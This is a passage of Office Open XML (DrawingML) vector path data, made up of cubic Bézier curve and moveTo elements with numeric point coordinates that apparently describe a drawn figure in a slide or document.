                  <a:cubicBezTo>
                    <a:pt x="1" y="162"/>
                    <a:pt x="3" y="160"/>
                    <a:pt x="7" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="159"/>
                    <a:pt x="12" y="159"/>
                    <a:pt x="14" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="158"/>
                    <a:pt x="22" y="154"/>
                    <a:pt x="23" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="149"/>
                    <a:pt x="23" y="149"/>
                    <a:pt x="23" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="153"/>
                    <a:pt x="23" y="159"/>
                    <a:pt x="17" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="162"/>
                    <a:pt x="12" y="162"/>
                    <a:pt x="9" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="162"/>
                    <a:pt x="9" y="162"/>
                    <a:pt x="9" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="162"/>
                    <a:pt x="3" y="163"/>
                    <a:pt x="4" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="169"/>
                    <a:pt x="6" y="170"/>
                    <a:pt x="6" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="176"/>
                    <a:pt x="8" y="179"/>
                    <a:pt x="6" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="184"/>
                    <a:pt x="5" y="186"/>
                    <a:pt x="4" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="190"/>
                    <a:pt x="4" y="191"/>
                    <a:pt x="7" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="193"/>
                    <a:pt x="11" y="193"/>
                    <a:pt x="13" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="196"/>
                    <a:pt x="35" y="199"/>
                    <a:pt x="45" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="203"/>
                    <a:pt x="52" y="204"/>
                    <a:pt x="55" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="202"/>
                    <a:pt x="66" y="197"/>
                    <a:pt x="65" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="185"/>
                    <a:pt x="62" y="182"/>
                    <a:pt x="60" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="169"/>
                    <a:pt x="49" y="160"/>
                    <a:pt x="42" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="149"/>
                    <a:pt x="37" y="147"/>
                    <a:pt x="35" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="143"/>
                    <a:pt x="29" y="142"/>
                    <a:pt x="27" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="145"/>
                    <a:pt x="25" y="144"/>
                    <a:pt x="25" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="140"/>
                    <a:pt x="24" y="136"/>
                    <a:pt x="25" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="132"/>
                    <a:pt x="26" y="131"/>
                    <a:pt x="27" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="124"/>
                    <a:pt x="32" y="118"/>
                    <a:pt x="35" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="106"/>
                    <a:pt x="39" y="99"/>
                    <a:pt x="43" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="90"/>
                    <a:pt x="49" y="86"/>
                    <a:pt x="52" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="80"/>
                    <a:pt x="56" y="76"/>
                    <a:pt x="58" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="70"/>
                    <a:pt x="60" y="67"/>
                    <a:pt x="60" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="57"/>
                    <a:pt x="59" y="51"/>
                    <a:pt x="59" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="38"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="58" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="16"/>
                    <a:pt x="63" y="8"/>
                    <a:pt x="73" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="81" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="0"/>
                    <a:pt x="97" y="1"/>
                    <a:pt x="102" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="6"/>
                    <a:pt x="114" y="11"/>
                    <a:pt x="117" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="23"/>
                    <a:pt x="122" y="29"/>
                    <a:pt x="122" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="39"/>
                    <a:pt x="122" y="43"/>
                    <a:pt x="123" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="61"/>
                    <a:pt x="128" y="74"/>
                    <a:pt x="138" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="97"/>
                    <a:pt x="156" y="112"/>
                    <a:pt x="159" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="133"/>
                    <a:pt x="161" y="138"/>
                    <a:pt x="160" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="144"/>
                    <a:pt x="159" y="145"/>
                    <a:pt x="159" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="147"/>
                    <a:pt x="158" y="147"/>
                    <a:pt x="157" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="148"/>
                    <a:pt x="154" y="150"/>
                    <a:pt x="153" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="154"/>
                    <a:pt x="149" y="156"/>
                    <a:pt x="147" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="160"/>
                    <a:pt x="139" y="160"/>
                    <a:pt x="135" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="158"/>
                    <a:pt x="132" y="157"/>
                    <a:pt x="131" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="153"/>
                    <a:pt x="129" y="152"/>
                    <a:pt x="128" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="149"/>
                    <a:pt x="126" y="147"/>
                    <a:pt x="125" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="148"/>
                    <a:pt x="122" y="149"/>
                    <a:pt x="121" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="155"/>
                    <a:pt x="120" y="159"/>
                    <a:pt x="121" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="170"/>
                    <a:pt x="123" y="178"/>
                    <a:pt x="122" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="188"/>
                    <a:pt x="121" y="191"/>
                    <a:pt x="122" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="201"/>
                    <a:pt x="129" y="204"/>
                    <a:pt x="136" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="201"/>
                    <a:pt x="142" y="199"/>
                    <a:pt x="144" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="191"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="165" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="185"/>
                    <a:pt x="170" y="183"/>
                    <a:pt x="173" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="182"/>
                    <a:pt x="174" y="181"/>
                    <a:pt x="175" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="179"/>
                    <a:pt x="176" y="178"/>
                    <a:pt x="175" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="175"/>
                    <a:pt x="172" y="174"/>
                    <a:pt x="171" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="173"/>
                    <a:pt x="169" y="172"/>
                    <a:pt x="168" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="171"/>
                    <a:pt x="161" y="167"/>
                    <a:pt x="160" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="160"/>
                    <a:pt x="160" y="157"/>
                    <a:pt x="160" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="154"/>
                    <a:pt x="160" y="153"/>
                    <a:pt x="161" y="152"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="71" y="68"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="68"/>
                    <a:pt x="71" y="68"/>
                    <a:pt x="71" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="71"/>
                    <a:pt x="74" y="73"/>
                    <a:pt x="77" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="74"/>
                    <a:pt x="85" y="73"/>
                    <a:pt x="88" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="70"/>
                    <a:pt x="94" y="68"/>
                    <a:pt x="98" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="66"/>
                    <a:pt x="100" y="65"/>
                    <a:pt x="101" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="65"/>
                    <a:pt x="102" y="66"/>
                    <a:pt x="102" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="66"/>
                    <a:pt x="102" y="67"/>
                    <a:pt x="102" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="68"/>
                    <a:pt x="100" y="69"/>
                    <a:pt x="99" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="71"/>
                    <a:pt x="91" y="74"/>
                    <a:pt x="87" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="78"/>
                    <a:pt x="83" y="79"/>
                    <a:pt x="81" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="82"/>
                    <a:pt x="76" y="81"/>
                    <a:pt x="73" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="76"/>
                    <a:pt x="69" y="74"/>
                    <a:pt x="67" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="70"/>
                    <a:pt x="66" y="70"/>
                    <a:pt x="65" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="70"/>
                    <a:pt x="65" y="70"/>
                    <a:pt x="65" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="72"/>
                    <a:pt x="64" y="74"/>
                    <a:pt x="63" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="79"/>
                    <a:pt x="61" y="81"/>
                    <a:pt x="60" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="86"/>
                    <a:pt x="57" y="88"/>
                    <a:pt x="57" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="94"/>
                    <a:pt x="58" y="96"/>
                    <a:pt x="58" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="98"/>
                    <a:pt x="57" y="99"/>
                    <a:pt x="56" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="104"/>
                    <a:pt x="52" y="108"/>
                    <a:pt x="50" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="117"/>
                    <a:pt x="46" y="122"/>
                    <a:pt x="46" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="130"/>
                    <a:pt x="46" y="133"/>
                    <a:pt x="46" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="137"/>
                    <a:pt x="45" y="138"/>
                    <a:pt x="45" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="141"/>
                    <a:pt x="44" y="141"/>
                    <a:pt x="43" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="140"/>
                    <a:pt x="41" y="139"/>
                    <a:pt x="40" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="134"/>
                    <a:pt x="37" y="129"/>
                    <a:pt x="38" y="124"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="123"/>
                    <a:pt x="38" y="122"/>
                    <a:pt x="38" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="121"/>
                    <a:pt x="38" y="121"/>
                    <a:pt x="38" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="121"/>
                    <a:pt x="37" y="122"/>
                    <a:pt x="37" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="127"/>
                    <a:pt x="35" y="131"/>
                    <a:pt x="36" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="137"/>
                    <a:pt x="38" y="140"/>
                    <a:pt x="40" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="146"/>
                    <a:pt x="48" y="149"/>
                    <a:pt x="52" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="157"/>
                    <a:pt x="62" y="161"/>
                    <a:pt x="67" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="167"/>
                    <a:pt x="70" y="169"/>
                    <a:pt x="69" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="174"/>
                    <a:pt x="67" y="176"/>
                    <a:pt x="64" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="177"/>
                    <a:pt x="63" y="177"/>
                    <a:pt x="62" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="179"/>
                    <a:pt x="65" y="181"/>
                    <a:pt x="66" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="185"/>
                    <a:pt x="69" y="188"/>
                    <a:pt x="69" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="193"/>
                    <a:pt x="70" y="195"/>
                    <a:pt x="70" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="197"/>
                    <a:pt x="70" y="197"/>
                    <a:pt x="70" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="195"/>
                    <a:pt x="73" y="193"/>
                    <a:pt x="72" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="188"/>
                    <a:pt x="70" y="186"/>
                    <a:pt x="69" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="183"/>
                    <a:pt x="68" y="182"/>
                    <a:pt x="68" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="181"/>
                    <a:pt x="71" y="181"/>
                    <a:pt x="72" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="184"/>
                    <a:pt x="76" y="185"/>
                    <a:pt x="79" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="187"/>
                    <a:pt x="91" y="186"/>
                    <a:pt x="97" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="184"/>
                    <a:pt x="106" y="182"/>
                    <a:pt x="109" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="177"/>
                    <a:pt x="112" y="175"/>
                    <a:pt x="113" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="173"/>
                    <a:pt x="115" y="172"/>
                    <a:pt x="115" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="172"/>
                    <a:pt x="116" y="173"/>
                    <a:pt x="117" y="174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="178"/>
                    <a:pt x="117" y="182"/>
                    <a:pt x="115" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="188"/>
                    <a:pt x="114" y="190"/>
                    <a:pt x="114" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="194"/>
                    <a:pt x="114" y="195"/>
                    <a:pt x="116" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="191"/>
                    <a:pt x="118" y="186"/>
                    <a:pt x="119" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="178"/>
                    <a:pt x="120" y="174"/>
                    <a:pt x="119" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="167"/>
                    <a:pt x="118" y="163"/>
                    <a:pt x="118" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="156"/>
                    <a:pt x="118" y="153"/>
                    <a:pt x="119" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="147"/>
                    <a:pt x="122" y="145"/>
                    <a:pt x="126" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="145"/>
                    <a:pt x="126" y="145"/>
                    <a:pt x="126" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="142"/>
                    <a:pt x="129" y="140"/>
                    <a:pt x="132" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="137"/>
                    <a:pt x="141" y="138"/>
                    <a:pt x="146" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="138"/>
                    <a:pt x="142" y="137"/>
                    <a:pt x="140" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="119"/>
                    <a:pt x="135" y="97"/>
                    <a:pt x="126" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="97"/>
                    <a:pt x="134" y="103"/>
                    <a:pt x="136" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="116"/>
                    <a:pt x="140" y="123"/>
                    <a:pt x="139" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="135"/>
                    <a:pt x="136" y="137"/>
                    <a:pt x="132" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="138"/>
                    <a:pt x="128" y="137"/>
                    <a:pt x="128" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="132"/>
                    <a:pt x="127" y="130"/>
                    <a:pt x="127" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="121"/>
                    <a:pt x="126" y="114"/>
                    <a:pt x="124" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="102"/>
                    <a:pt x="121" y="98"/>
                    <a:pt x="117" y="95"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="94"/>
                    <a:pt x="117" y="94"/>
                    <a:pt x="117" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="86"/>
                    <a:pt x="112" y="79"/>
                    <a:pt x="107" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="70"/>
                    <a:pt x="105" y="67"/>
                    <a:pt x="106" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="62"/>
                    <a:pt x="106" y="60"/>
                    <a:pt x="107" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="55"/>
                    <a:pt x="106" y="54"/>
                    <a:pt x="104" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="52"/>
                    <a:pt x="97" y="50"/>
                    <a:pt x="94" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="48"/>
                    <a:pt x="91" y="46"/>
                    <a:pt x="91" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="43"/>
                    <a:pt x="91" y="41"/>
                    <a:pt x="92" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="37"/>
                    <a:pt x="95" y="36"/>
                    <a:pt x="98" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="37"/>
                    <a:pt x="101" y="38"/>
                    <a:pt x="102" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="42"/>
                    <a:pt x="103" y="45"/>
                    <a:pt x="102" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="48"/>
                    <a:pt x="101" y="49"/>
                    <a:pt x="102" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="51"/>
                    <a:pt x="107" y="50"/>
                    <a:pt x="107" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="43"/>
                    <a:pt x="107" y="39"/>
                    <a:pt x="105" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="31"/>
                    <a:pt x="100" y="29"/>
                    <a:pt x="96" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="30"/>
                    <a:pt x="88" y="33"/>
                    <a:pt x="87" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="39"/>
                    <a:pt x="87" y="40"/>
                    <a:pt x="87" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="43"/>
                    <a:pt x="87" y="45"/>
                    <a:pt x="87" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="45"/>
                    <a:pt x="83" y="45"/>
                    <a:pt x="81" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="45"/>
                    <a:pt x="80" y="45"/>
                    <a:pt x="80" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="46"/>
                    <a:pt x="78" y="45"/>
                    <a:pt x="78" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="41"/>
                    <a:pt x="77" y="38"/>
                    <a:pt x="76" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="35"/>
                    <a:pt x="76" y="34"/>
                    <a:pt x="76" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="32"/>
                    <a:pt x="73" y="30"/>
                    <a:pt x="70" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="31"/>
                    <a:pt x="67" y="32"/>
                    <a:pt x="66" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="39"/>
                    <a:pt x="63" y="44"/>
                    <a:pt x="66" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="50"/>
                    <a:pt x="67" y="51"/>
                    <a:pt x="68" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="51"/>
                    <a:pt x="69" y="50"/>
                    <a:pt x="69" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="48"/>
                    <a:pt x="68" y="48"/>
                    <a:pt x="67" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="45"/>
                    <a:pt x="65" y="42"/>
                    <a:pt x="66" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="37"/>
                    <a:pt x="71" y="36"/>
                    <a:pt x="73" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="39"/>
                    <a:pt x="75" y="42"/>
                    <a:pt x="75" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="46"/>
                    <a:pt x="74" y="47"/>
                    <a:pt x="73" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="48"/>
                    <a:pt x="72" y="48"/>
                    <a:pt x="72" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="51"/>
                    <a:pt x="69" y="52"/>
                    <a:pt x="66" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="54"/>
                    <a:pt x="65" y="55"/>
                    <a:pt x="64" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="57"/>
                    <a:pt x="64" y="58"/>
                    <a:pt x="65" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="60"/>
                    <a:pt x="67" y="61"/>
                    <a:pt x="68" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="66"/>
                    <a:pt x="74" y="66"/>
                    <a:pt x="78" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="66"/>
                    <a:pt x="87" y="64"/>
                    <a:pt x="91" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="62"/>
                    <a:pt x="98" y="61"/>
                    <a:pt x="101" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="58"/>
                    <a:pt x="102" y="57"/>
                    <a:pt x="103" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="58"/>
                    <a:pt x="103" y="59"/>
                    <a:pt x="103" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="60"/>
                    <a:pt x="102" y="61"/>
                    <a:pt x="102" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="63"/>
                    <a:pt x="91" y="65"/>
                    <a:pt x="86" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="69"/>
                    <a:pt x="78" y="69"/>
                    <a:pt x="74" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="68"/>
                    <a:pt x="72" y="68"/>
                    <a:pt x="71" y="68"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="73" y="45"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="43"/>
                    <a:pt x="73" y="41"/>
                    <a:pt x="72" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="39"/>
                    <a:pt x="71" y="39"/>
                    <a:pt x="70" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="40"/>
                    <a:pt x="70" y="40"/>
